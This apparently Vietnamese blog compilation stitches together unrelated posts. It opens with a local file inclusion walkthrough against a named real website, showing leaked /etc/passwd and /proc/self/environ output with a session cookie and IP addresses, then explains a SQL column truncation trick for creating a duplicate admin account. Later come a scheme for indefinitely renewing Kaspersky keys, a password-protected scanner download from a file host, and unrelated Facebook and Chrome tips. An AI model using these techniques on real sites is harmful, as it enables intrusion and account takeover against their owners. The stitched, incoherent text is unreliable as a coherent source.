PHP filesystem attack vectors

http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/ <—- link cho các bạn kham thảo

nội dung chủ yếu xoay quanh vấn đề :

– Trong php(linux) các bạn include file : /etc/passwd/./././. sẽ trả ra cùng với quả với việc các bạn include : /etc/passwd <——- lợi dụng cái này để bypass blackist trong các hàm ghi file của các editor…

– Trong các hàm liên quan đến file của PHP,ví dụ như hàm include : include(path) thì biến path là đường dẫn đến file cần include,tuy nhiên biến path này cũng có giới hạn số ký tự <—- mình dùng cái này cho các site bị LFI mà không thể dùng null byte (do magic_quotes_gpc = On) để kết thúc chuỗi

Chi tiết victim mình chọn là :

http://cinebox212.com.vn/index.php?page=abc <— đề nghị các bạn không được phá hoại trang web này,đây mình chỉ demo cho các bạn xem kỹ thuật hoàn toàn không khuyến khích

các bạn có hành động phá hoại

B1 : kiểm tra lỗi

require_once(modules/abc.php) <———— dính chưởng

B2 : kiểm tra xem magic_quotes_gpc on hay off

Warning: require_once(modules/abc\0.php) [function.require-once]: failed to open stream: No such file or directory in /home/cinebox212/domains/cinebox212.com.vn/public_html/classes/webpage.php on line 274

<—————- magic_quotes_gpc = On rồi :”>

B3 : kiểm tra xem limit path của hàm require_once là bao nhiêu

414 Request-URI Too Large <— 2030 thì hơi bị bự

giảm xuống cái : 2020

giảm tiếp vậy

khà khà vậy là ở giữa 2010 và 2015

đoán tiếp vậy

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

<———– Cool exploit thành công

Tiếp theo thử xem mình có đủ quyền để truy cập vào /proc/self/environ hay không

do đường dẫn : /etc/passwd và /proc/self/environ thì cái /proc/self/environ nhiều ký tự hơn nên mình phải xóa bớt /.

B4 : exploit

DOCUMENT_ROOT=/home/cinebox212/domains/cinebox212.com.vn/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7 HTTP_ACCEPT_ENCODING=gzip,deflate HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5 HTTP_CONNECTION=close HTTP_COOKIE=PHPSESSID=9a5b8be46db1c0d5333dda79400713c3 HTTP_HOST=cinebox212.com.vn HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 HTTP_X_FORWARDED_FOR=125.234.5.26 HTTP_X_REAL_IP=125.234.5.26 PATH=/bin:/usr/bin PHPRC=/usr/local/etc/php5/cgi/ QUERY_STRING=page=./../../../../../../../proc/self/environ/

cool

Xong rồi,thử lấy PHP info thông qua LFI xem

PHP Version 5.2.10 <—

nếu các bạn thử select : select * from user where username ='admin'
thì giá trị sẽ trả về gì nhỉ ??
ngạc nhiên đúng không
mysql> select * from user where username='admin';
+———-+———-+
| username | password |
+———-+———-+
| admin | 123 |
| admin | 1234 |
+———-+———-+
2 rows in set (0.00 sec)
vậy là nó trả về 2 user : 'admin' và 'admin '
ngoài ra các bạn để ý việc là column username có lenght limit là 10 , nghĩa là nếu các bạn insert một giá trị username có chiều dài hơn 10 ký tự thì từ ký tự thứ 11 trở đi sẽ bị cắt bỏ,ví dụ bạn đăng ký một username là 'admin x'(x ký ký tự thứ 11) thì username insert vào là 'admin '
chính 2 điều này gây ra bug SQL Column Truncation.Bạn hãy nghĩ 1 tính huống :
- Một 4rum cho đăng ký account
- Account quản trị là admin
- Giới hạn chiều dài username là 10
Bạn sẽ đăng ký một account với username là 'admin x' (x là ký tự thứ 11), 4rum sẽ kiểm tra username có tồn tại hay không bằng câu truy vấn :

hì,trong db tất nhiên là không có username là 'admin x' rồi. Lúc này 4rum sẽ ínert vào db :
 

nếu query thì thêm 1 account admin nữa insert vào

coder thường không để ý đến bug này,nếu bạn kết hợp bug này với nhiều bug khác chắc hẳn sẽ tạo nên bug nguy hiểm
PS: bug này được dùng để khai khác nukeviet RC 2.0 , khi nào rảnh mình sẽ viết bài phân tích bug của nukeviet RC 2.0         

heocon@heocon-laptop:~$ cat --help
    Usage: cat [OPTION]... [FILE]...
    Concatenate FILE(s), or standard input, to standard output.
    -A, --show-all           equivalent to -vET
    -b, --number-nonblank    number nonempty output lines
    -e                       equivalent to -vE
    -E, --show-ends          display $ at end of each line
    -n, --number             number all output lines
    -s, --squeeze-blank      suppress repeated empty output lines
    -t                       equivalent to -vT
    -T, --show-tabs          display TAB characters as ^I
    -u                       (ignored)
    -v, --show-nonprinting   use ^ and M- notation, except for LFD and TAB
    --help     display this help and exit
    --version  output version information and exit
    With no FILE, or when FILE is -, read standard input.
    Examples:
    cat f - g  Output f's contents, then standard input, then g's contents.
    cat        Copy standard input to standard output.
    Report cat bugs to bug-coreutils@gnu.org
    GNU coreutils home page:
    General help using GNU software: <http://www.gnu.org/gethelp/>
    Report cat translation bugs to <http://translationproject.org/team/>

Code : http://www.mediafire.com/download.php?3f46a0prk3eikvc

help_command()
{
echo -e "Test parse options"
echo -e "How to use : $0 option"
echo -e " option :"
echo -e " -h, --help show help message"
echo -e " --version show programe's version"
echo -e " --host add host"
echo -e " --proxy add proxy, default is None"
}
if [ $# -eq 0 ]
then
help_command
exit 0;
fi
while [[ $# != 0 ]]; do
option_name=$1; shift
case "$option_name" in
--help|-?|-h) help_command; exit 0;;
--version) echo "Test parse options 1.0"; exit 0;;
--host) host=$1; shift;;
--proxy) proxy=$1; shift;;
*) echo "invalid option: $1"; help_command;exit 0;;
esac
done
echo "Host : "$host
echo "Proxy :"$proxy

heocon@heocon-laptop:/pentest/bashshell$ ./parse_option.sh --help
Test parse options
How to use : ./parse_option.sh option
option :
-h, --help show help message
--version show programe's version
--host add host
--proxy add proxy, default is None
heocon@heocon-laptop:/pentest/bashshell$ ./parse_option.sh --version
Test parse options 1.0
heocon@heocon-laptop:/pentest/bashshell$ ./parse_option.sh --host 27.0.0.1 --proxy 192.168.1.1
Host : 27.0.0.1
Proxy :192.168.1.1
heocon@heocon-laptop:/pentest/bashshell$

Các bạn còn nhớ bài viết “Miễn phí Kaspersky Internet Security 2009 bản quyền trọn đời” Misao viết cách đây không lâu chứ? Sau bài viết đó, Misao nhận được rất nhiều ý kiến của bạn đọc hỏi rằng liệu có cách nào áp dụng bản quyền trọn đời cho KIS 2010 hay không? Câu trả lời là có.

Hôm nay Misao sẽ tiếp tục hướng dẫn các bạn cách đăng kí và sử dụng miễn phí Kaspersky Internet Security 2010 bản quyền trọn đời. Tuy nhiên phiên bản này chỉ hoạt động trên Windows 7 do vậy nếu bạn đang dùng Win XP hay Vista, hãy update lên Win 7 nếu muốn thực hiện theo hướng dẫn này.

Để đăng kí miễn phí Kaspersky Internet Security 2010 trọn đời, các bạn hãy thực hiện các bước sau:

1, Bạn vào link này điền đầy đủ thông tin và đăng kí một tài khoản tại đó.

2, Kiểm tra hòm mail. Bạn sẽ thấy một email của ComputerBild với đường link kích hoạt tài khoản. Click vào link đó.

3, Các bạn vào link này: http://misaoblog.com/kis-2010-win-7 và đăng nhập bằng username với password đã đăng kí ở bước 1.

4, Click chọn ô thứ hai để yêu cầu lấy key Kaspersky Security Suite CBE Win7 sau đó click nút “Lizenzschlüssel anfordern”.

5, Check mail một lần nữa bạn sẽ thấy có 1 email chứa key kích hoạt Kaspersky Security Suite CBE Win7. (Key này luôn giống nhau do đó bạn không cần phải đăng kí nhiều lần cho mất thời gian)

6, Tải về Kaspersky Security Suite CBE Win7 tại đây: Download

7, Sau khi cài đặt, bạn sẽ thấy giao diện của nó là tiếng Đức. Tuy nhiên bạn có thể chuyển nó sang tiếng Anh bằng cách sau. Click nút Einstellungen phía trên cùng bên phải để mở cửa sổ settings.

8, Click nút Einstellungen phía menu bên trái và bỏ chọn Selbstschutz aktiveren. Click OK để đóng cửa sổ Einstellungen lại.

9, Download và chạy file registry này để chuyển giao diện từ tiếng Đức sang tiếng Anh. Sau khi chuyển xong, bạn làm lại bước 8 và chọn “Enable Protection”.

10, Khởi động lại máy và bạn sẽ thấy giao diện của Kaspersky Security Suite CBE Win7 đã chuyển thành Kaspersky Internet Security 2010 hoàn toàn tiếng Anh.

Bạn sẽ thấy rằng bản quyền của mình chỉ còn khoảng 2 tháng nữa là hết hạn. Tuy nhiên bạn hãy yên tâm vì khi nào key hết hạn, bạn chỉ cần làm lại từ bước 3 là lại có một key mới có hạn dùng trong 3 tháng. Cứ như vậy, bạn có thể dùng KIS 2010 trọn đời rồi đó. :p Lưu ý là key này không áp dụng được cho Kaspersky Anti Virus và Kaspersky Internet Security chính hãng đâu nhé.

Cuối cùng, tiếc rằng phiên bản này chỉ chạy trên Windows 7. Bạn không thể install Kaspersky Security Suite CBE Win7 trên XP hoặc Vista. Nếu bạn vẫn đang dùng XP hay Vista, bạn có thể tham khảo bài viết này.

Chúc các bạn thành công và có ngày nghỉ cuối tuần vui vẻ và an toàn với Kaspersky Internet Security 2010!

Đóng góp của bạn tuan anh về cách chuyển KIS 2010 sang tiếng Anh hoặc tiếng Việt:

Sau khi các bạn cài xong kis2010 sẽ mang giao diện tiếng Đức, các bạn sẽ khó khăn hơn nhiều vì không biết tiếng Đức, nếu ai ko rành về regedit muốn đổi sang giao diện tiếng Anh ngay lập tức có thể dùng tổ hợp phím Shift+F12 để đổi sang giao diện tiếng Anh 1 cách nhanh chóng mà không mất công chỉnh sửa j cả (cải tiến hơn so với kis2009 cbe).

Còn các bạn nào muốn pro hơn nữa thì có thể chuyển sang giao diện tiếng Việt cũng được.

Hướng dẫn chuyển sang tiếng Việt:

1. Bạn download thư mục vi tại đường dẫn link update mới nhất và chính xác nhất không bị lỗi trắng xóa khi việt hóa như các bạn trước đã mắc phải http://www.mediafire.com/?w20dtyznkmy, giải nén ra thành folder tên vi

2. Bạn restart máy tính và khởi động vào chế độ safemode bằng cách bấm phím F8. Chép thư mục vi vào đường dẫn C:\Program Files\Kaspersky Lab\Kaspersky Security Suite CBE 09\Skin\loc

3. Bạn vào Start\Run\gõ regedit.

* Đối với win7 32bit:
HKey_Local_Machine\Software\KasperskyLab\protected\AVP9\environment thay đổi giá trị Localization từ de sang vi.

* Đối với win7 64bit:
HKey_Local_Machine\Software\Wow6432Node\KasperskyLab\protected\AVP9\environment thay đổi giá trị Localization từ de sang vi.

4. Khởi động lại máy tính ở chế độ bình thường, đã xong bạn đã có 1 KIS2010 Win7 bản quyền hoàn toàn bằng tiếng việt.

Chúc các bạn thành công!!!

From : http://misaoblog.com/software/mien-phi-kaspersky-internet-security-2010-tron-doi-tren-windows-7.html

• Các webmaster để kiểm tra lỗi cho ứng dụng web của mình
• Các nhà quản trị server dùng để kiểm lỗi cho ứng dụng web chạy trên server để đưa ra các cảnh báo kịp thời cho các webmaster Acunetix có thể hổ trợ bạn.
• Tìm kiếm lỗi của một website: SQL Injection, XSS…
• Tìm kiếm cấu trúc của một website.
• Tìm kiếm lỗi của server chứa website và các thông tin liên quan đến server của website.
• Báo cáo cũng như gợi ý chỉnh sửa các lỗi của website.
• Lưu các kết quả báo cáo cho việc fix lỗi sau này.
• Lập lịch tiến hành scan lỗi cho website.
• Cùng nhiều công cụ hổ trợ fix lỗi website khác.

Download: http://www.mediafire.com/?icapdgt44d95t7n

Password for unzip : 123456

Những lỗi mà Acunetix có thể phát hiện được:

Version Check

• Vulnerable Web Servers
• Vulnerable Web Server Technologies – such as “PHP 4.3.0 file disclosure and possible code execution.

CGI Tester

• Checks for Web Servers Problems – Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE)
• Verify Web Server Technologies

Parameter Manipulation

• Cross-Site Scripting (XSS) – over 40 different XSS variations are tested.
• SQL Injection
• Code Execution(Unix and Windows)
• Directory Traversal (Unix and Windows)
• File Inclusion
• Script Source Code Disclosure
• CRLF Injection
• Cross Frame Scripting (XFS)
• PHP Code Injection
• XPath Injection
• Full Path Disclosure
• LDAP Injection
• Cookie Manipulation
• Arbitrary File creation (AcuSensor Technology)
• Arbitrary File deletion (AcuSensor Technology)
• Email Injection (AcuSensor Technology)
• File Tampering (AcuSensor Technology)
• URL redirection
• Remote XSL inclusion

MultiRequest Parameter Manipulation

• Blind SQL/XPath Injection

File Checks

• Checks for Backup Files or Directories – Looks for common files (such as logs, application traces, CVS web repositories)
• Cross Site Scripting in URI
• Checks for Script Errors

File Uploads

• Unrestricted File uploads Checks

Directory Checks

• Looks for Common Files (such as logs, traces, CVS)
• Discover Sensitive Files/Directories
• Discovers Directories with Weak Permissions
• Cross Site Scripting in Path and PHPSESSID Session Fixation.
• Web Applications
• HTTP Verb Tampering

Text Search

• Directory Listings
• Source Code Disclosure
• Check for Common Files
• Check for Email Addresses
• Microsoft Office Possible Sensitive Information
• Local Path Disclosure
• Error Messages
• Trojan shell scripts (such as popular PHP shell scripts like r57shell, c99shell etc)

Weak Passwords

• Weak HTTP Passwords

GHDB Google Hacking Database

• Over 1200 GHDB Search Entries in the Database

Port Scanner and Network Alerts

• Port scans the web server and obtains a list of open ports with banners
• Performs complex network level vulnerability checks on open ports such as:
  • DNS Server vulnerabilities (Open zone transfer, Open recursion, cache poisoning)
  • FTP server checks (list of writable FTP directories, weak FTP passwords, anonymous access allowed)
  • Security and configuration checks for badly configured proxy servers
  • Checks for weak SNMP community strings and weak SSL cyphers
  • and many other network level vulnerability checks!

Other vulnerability tests may also be preformed using the manual tools provided, including:

• Input Validation
• Authentication attacks
• Buffer overflows
• Blind SQL injection
• Sub domain scanning

Với số lượng người dùng như thế, Facebook quản lý một lượng dữ liệu khổng lồ:

• Mỗi tháng có khoảng 630 tỉ lượt page views
• Hơn 3 tỉ bức ảnh được tải lên Facebook hàng tháng, trung bình có 1,2 triệu bức ảnh mỗi giây
• Hơn 25 tỉ dữ liệu về thông tin (status, comment…v.v) được chia sẻ mỗi tháng.
• 30.000 máy chủ.

Các phần mềm xử lý lượng dữ liệu khổng lồ đó đều là phần mềm nguồn mở. Ngoài việc dùng các PMNM có sẵn được customize theo nhu cầu riêng, Facebook còn xây dựng và chia sẻ một số PMNM cho cộng đồng.

Nền tảng web của Facebook là LAMP (Linux, Apache, MySQL và PHP), nhưng đã được sửa đổi.

Ngôn ngữ lập trình dùng PHP được cải tiến qua dự án HipHop for PHP để tăng tốc, cải thiện hiệu quả và giảm mức độ sử dụng CPU.

PHP là ngôn ngữ kịch bản (scripting) được thông dịch khi chạy vì vậy hơi chậm. HipHop chuyển đổi PHP thành C++ rồi dịch ra mã thực thi nên chạy nhanh hơn. Nhóm phát triển HipHop ban đầu chỉ có 3 người, làm trong 18 tháng.

Facebook có ba lớp dữ liệu: lớp đầu tiên là cơ sở dữ liệu MySQL, bên trên MySQL là công nghệ cache Memcached và trên cùng là webserver Apache.

Memcached đã được Facebook tối ưu qua nhiều năm. Lớp cache này nhằm tăng tốc truy cập dữ liệu của webserver (tìm dữ liệu trực tiếp từ MySQL tương đối chậm). Hiện tại, Facebook có hàng nghìn máy chủ chạy Memcached với hàng chục terabyte dữ liệu cache tại mỗi thời điểm.

Haystack là hệ thống lưu trữ và tìm kiếm ảnh cao tốc của Facebook. Nó xử lý 20 tỷ ảnh được upload lên Facebook, mỗi ảnh lại được lưu thành 4 bản với độ phân giải khác nhau, tổng cộng hơn 80 tỷ ảnh. Với số lượng đó, tốc độ tìm kiếm là yếu tố sống còn.

Ngoài MySQL, Facebook còn phát triển một cặp cơ sở dữ liệu không dùng ngôn ngữ SQL là Cassandra và HBase.

Cassandra là một hệ thống lưu trữ và tìm kiếm phân tán với khoảng 150 terabyte dữ liệu thư từ trong Inbox của Facebook. Twitter cũng dùng Cassandra.

Hadoop là một dự án nguồn mở dùng xử lý các dữ liệu phân tán. Nó bao gồm một loạt dự án con: HBase – cơ sở dữ liệu phân tán, Chuckwa – hệ thống thu thập quản lý dữ liệu phân tán, v.v… Hệ thống Hadoop cluster của Facebook gồm 2.200 máy chủ với khoảng 23.000 CPU xử lý hơn 50 petabytes dữ liệu.

Các công ty Internet lớn đều dùng Hadoop: Facebook, Twitter, Google, Amazon, Yahoo, … Yahoo dùng Hadoop trong 36.000 máy chủ với 100.000 CPU để tìm kiếm trên web và lưu quảng cáo.

Còn nhiều nữa. Danh sách các dự án nguồn mở mà Facebook tham gia xem tại đây.

Đại thể bài này cho thấy khả năng PMNM quản lý những lượng dữ liệu cực lớn và điều quan trọng là chủ nhân có thể sửa đổi, tùy biến theo nhu cầu của mình qua kinh nghiệm vận hành. Nếu dùng phần mềm nguồn đóng thì chưa nói đến chi phí bản quyền, bảo trì, việc phụ thuộc vào nhà cung cấp để cải tiến dịch vụ của site cũng đủ điên đầu rồi.

Nguồn tham khảo:

Inside Facebook’s Open Source Infrastructure

Exploring the software behind Facebook, the world’s largest site

Facebook Built Walled Garden with Open Source Software

From : http://zxc232.wordpress.com/2010/07/26/500-trieu-nguoi-dang-ky-dung-phan-mem-nguon-mo/

1. Windows 7 không bản quyền dễ bị crash với Google Chrome.
2. Windows 7 64bit dễ bị crash hơn Windows 7 x86.
3. Các trang web load FLASH nhiều dễ bị crash.
4. Chromes bị xung đột với chức năng "Use advanced browser integration" của chương trình Internet Download Manager (ver 5.x) làm cho Explorer của Windows bị đóng băng.

* Chrome & Internet Download Manager (ver 5.x)

Để Internet Download Manager hỗ trợ việc capture link để download trong Chrome, thì bạn phải bật tính năng "Use advanced browser integration" tuy nhiên tính năng này thường xuyên làm cho Explorer của Windows 7 64bit bị đóng băng (Freezes) khi bạn mở Chromes với nhiều TAB, khi đó bạn không sử dụng được Explorer và có cảm giác Windows mình đang bị treo vậy, chỉ còn sử dụng được tổ hợp phím Ctrl + Alt + Delete, thật là cảm giác khó chịu, để giải quyết vấn đề này, chúng ta đành phải hy sinh, không dùng tính năng "Use advanced browser integration", đợi khi nào có version 6.x của IDM, tác giả IDM đã report trong version 6.x sẽ fix các lỗi xung đột với Chrome….

Đây là hình ảnh IDM của mình

There are many users reporting that Google Chrome doesn’t work with Microsoft latest operating system Windows 7 64 bit version. Here is solution to make Google Chrome Work on Windows 7 64 bit.

Run Google Chrome on Windows 7 64 bit Version

1. Right Click on Google Chrome Icon

2. Add –in-process-plugins after chrome.exe in Target field.

It should look like this,

3. Click Apply and save change.

4. Now start Google Chrome and it should work on your Windows 7 64 Bit Version

It can be done either from the Bios or from the Windows Mobility Center program – I used the latter: Press Windows key + "X".

When it opens the Win Mob Center, in the Function key row, choose 'Function key' as the Fn Key behaviour.

Default :

Changes :

To disable Java applets:

1. At the top of the Firefox windowOn the menu bar, open the Tools menu, and click on Add-ons. The Add-ons window will open.
2. Select the Plugins panel.
3. Select Java.
4. Click Disable.